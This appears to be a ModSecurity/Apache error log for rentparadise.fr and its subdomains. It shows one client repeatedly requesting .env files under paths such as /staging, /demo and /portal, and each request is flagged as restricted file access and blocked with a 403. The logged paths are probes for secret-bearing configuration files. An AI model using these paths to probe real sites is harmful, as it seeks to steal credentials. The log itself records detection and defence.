[Mon May 11 13:32:12.683845 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vbAAAAMg"]
[Mon May 11 13:32:12.687627 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0dgAAAAA"]
[Mon May 11 13:32:12.687813 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0dgAAAAA"]
[Mon May 11 13:32:12.687996 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0dgAAAAA"]
[Mon May 11 13:32:12.745217 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-POSQ-m-m0ukSShtdqwAAAUs"]
[Mon May 11 13:32:12.745391 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-POSQ-m-m0ukSShtdqwAAAUs"]
[Mon May 11 13:32:12.745580 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdqwAAAUs"]
[Mon May 11 13:32:12.766508 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-POJEyNRN152ArORltAAAAEM"]
[Mon May 11 13:32:12.766678 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-POJEyNRN152ArORltAAAAEM"]
[Mon May 11 13:32:12.766862 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORltAAAAEM"]
[Mon May 11 13:32:12.767388 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-POSQ-m-m0ukSShtdrQAAAUs"]
[Mon May 11 13:32:12.767592 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-POSQ-m-m0ukSShtdrQAAAUs"]
[Mon May 11 13:32:12.767787 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdrQAAAUs"]
[Mon May 11 13:32:12.772530 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-PKO9RdIr1DwxYR1vcAAAAMg"]
[Mon May 11 13:32:12.772808 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-PKO9RdIr1DwxYR1vcAAAAMg"]
[Mon May 11 13:32:12.773063 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vcAAAAMg"]
[Mon May 11 13:32:12.784064 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-PKy-5-wpj6Sx56Z0fQAAAAA"]
[Mon May 11 13:32:12.784300 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-PKy-5-wpj6Sx56Z0fQAAAAA"]
[Mon May 11 13:32:12.784498 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0fQAAAAA"]
[Mon May 11 13:32:12.789117 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-POJEyNRN152ArORltgAAAEM"]
[Mon May 11 13:32:12.789301 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-POJEyNRN152ArORltgAAAEM"]
[Mon May 11 13:32:12.789484 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORltgAAAEM"]
[Mon May 11 13:32:12.789683 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-POSQ-m-m0ukSShtdrgAAAUs"]
[Mon May 11 13:32:12.789896 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-POSQ-m-m0ukSShtdrgAAAUs"]
[Mon May 11 13:32:12.790105 2026] [security2:error] [pid 1319953:tid 1319966] [client 213.209.159.223:6146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POSQ-m-m0ukSShtdrgAAAUs"]
[Mon May 11 13:32:12.794778 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vcQAAAMg"]
[Mon May 11 13:32:12.794945 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vcQAAAMg"]
[Mon May 11 13:32:12.795121 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vcQAAAMg"]
[Mon May 11 13:32:12.808114 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0fwAAAAA"]
[Mon May 11 13:32:12.808317 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0fwAAAAA"]
[Mon May 11 13:32:12.808518 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0fwAAAAA"]
[Mon May 11 13:32:12.812142 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev.rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-POJEyNRN152ArORltwAAAEM"]
[Mon May 11 13:32:12.812309 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev.rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-POJEyNRN152ArORltwAAAEM"]
[Mon May 11 13:32:12.812489 2026] [security2:error] [pid 1320398:tid 1320403] [client 213.209.159.223:6196] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-POJEyNRN152ArORltwAAAEM"]
[Mon May 11 13:32:12.817668 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vcgAAAMg"]
[Mon May 11 13:32:12.817890 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-PKO9RdIr1DwxYR1vcgAAAMg"]
[Mon May 11 13:32:12.818099 2026] [security2:error] [pid 1320674:tid 1320698] [client 213.209.159.223:6212] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKO9RdIr1DwxYR1vcgAAAMg"]
[Mon May 11 13:32:12.832168 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0gQAAAAA"]
[Mon May 11 13:32:12.832413 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-PKy-5-wpj6Sx56Z0gQAAAAA"]
[Mon May 11 13:32:12.832617 2026] [security2:error] [pid 1319886:tid 1319897] [client 213.209.159.223:6162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.rentparadise.fr"] [uri "/403.shtml"] [unique_id "agG-PKy-5-wpj6Sx56Z0gQAAAAA"]
